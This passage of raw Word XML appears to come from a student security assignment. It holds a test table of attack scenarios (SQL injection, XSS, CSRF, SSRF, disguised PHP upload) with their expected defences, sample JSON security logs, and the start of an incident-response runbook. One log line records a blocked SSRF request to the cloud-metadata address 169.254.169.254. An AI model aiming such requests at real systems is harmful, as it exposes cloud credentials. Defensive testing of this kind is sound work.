        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="09BDFB18" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B0D766B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E849135" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQLi payload as login identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5EC369C8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rejected by format validation before reach</w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ing a query; generic error shown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="5887D818" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="58568E9A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0BA97D58" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQLi payload in admin search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="003A52D1" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Treated as a literal string; no extra rows returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="09BAF479" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6E79E516" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="55567972" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6 wrong passwords in 15 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="717DFF60" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6th+ attempt blocked immediately; account_locked logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="68509D4F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="64417D54" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3F71E245" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Session cookie before/after login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0F025A58" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>value changes on successful login (fixation defence)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="057D4442" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="77AFDA81" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="305E7BE7" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;script&gt; in bio field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33C41C45" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rendered as inert text, not executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="5859B7B4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="31B04C81" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5373B100" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Forged cross-site enrolment form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="185A396D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rejected with generic error; csrf_rejected logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="3D8A9ED8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="04E95B92" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="076AA817" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SSRF payload (metadata / localhost)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="21BF28BD" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rejected; </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ssrf_blocked logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="019E0990" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="09FCA98D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3D013AF9" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Student navigates to /admin/ directly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7340377F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HTTP 403 Forbidden; authorization_denied logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="7284B9E7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="26E187B2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="351F7BDA" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Upload a .php file renamed .png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="13DF246A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rejected — content-sniffed, not extension-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5C98" w:rsidRPr="00267CCC" w14:paraId="0273DE55" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="68DCCEBC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="79F3F59C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Inspect response headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1F22506B" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CSP, X-Content-Type-Options, </w:t>
            </w:r>
            <w:r w:rsidRPr="00267CCC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>X-Frame-Options, Referrer-Policy present</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="322524F8" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>7.3 Sample Log Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607F983" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A redacted, fictitious sample of the structured security log (docs/sample_logs/security.log.sample) illustrates the event trail the manual tests above would produce, including a rejected SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i-shaped login identifier, a lockout sequence, a rejected CSRF submission, two blocked SSRF attempts, and a denied admin-access attempt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFC0902" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">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r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{"ts":"2026-07-15T09:15:25+00:00","event":"account_locked","subject":"student1@example.test","ip":"203.0.113.7","detail":{"minutes":15}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>{"ts":"2026-07-15T10:07:48+00:00","event":"ssrf_blocked","subject":"student2@example.test","ip":"198.51.100.22","detail</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>":{"url":"http://169.254.169.254/","reason":"Only https URLs are permitted"}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>{"ts":"2026-07-15T10:20:36+00:00","event":"authorization_denied","subject":"student2@example.test","ip":"198.51.100.22","detail":{"required_role":"admin"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F25338" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On a real deployment, </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the equivalent live entries and accompanying browser/DB screenshots for each scenario in 7.2 form the evidence-folder submission for this assignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486F3561" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:r w:rsidRPr="00267CCC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FA042" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>8. Incident Response Runbook (Summary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893E28A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The full runbook (docs/incident_response_runbook.md) covers detec</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tion sources, containment, eradication, recovery and reporting steps for four scenarios; a summary follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66849A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00C24232" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24232">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Suspected Brute Force / Credential Stuffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F9D1D2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detected via login_failed / login_rate_limited / account_locked</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events. The application's own rate limiting and lockout contain single-account attacks automatically; an IP hitting many accounts (stuffing) is blocked at the firewall/WAF. Every incident is logged with start/end time, source IP(s), and whether any login </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ultimately succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F3693D" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00754396" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00754396">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Suspected SQL Injection Attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02191E0F" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detected via validation_rejected events containing SQL metacharacters, or abnormal response sizes from the admin search or login endpoints. Because every query is parameterised, a submitted payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot alter query structure even if it reaches the database layer; the response confirms whether the request was blocked at validation or reached (and was neutralised by) the database layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A2D136" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00754396" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00754396">
        <w:rPr>
          <w:b/>
